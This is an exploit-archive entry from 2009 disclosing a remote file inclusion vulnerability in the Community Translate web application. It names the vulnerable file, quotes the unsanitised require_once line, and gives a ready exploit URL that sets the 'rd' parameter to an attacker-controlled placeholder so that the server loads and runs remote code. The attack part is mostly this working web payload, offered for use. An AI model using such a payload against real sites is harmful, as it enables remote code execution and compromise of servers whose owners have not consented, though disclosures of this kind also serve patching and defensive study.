[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Community Translate File Inclusion Vulnerability
# Published : 2009-10-12
# Author : NoGe
# Previous Title : Everfocus <= 1.4 EDSR Remote Authentication Bypass
# Next Title : EZsneezyCal CMS 95.1-95.2 File Inclusion Vulnerability


[o] Community Translate Remote File Inclusion Vulnerability
Software     : Community Translate
Project Home : http://code.google.com/p/communitytranslate/
Author       : NoGe
Contact      : noge[dot]code[at]gmail[dot]com
Blog         : http://evilc0de.blogspot.com/
Home         : http://antisecurity.org/

[o] Vulnerable file
require_once("$rd/include/utilfunctions.php");

include/functions.php

[o] Exploit
http://localhost/[path]/include/functions.php?rd=[evilc0de]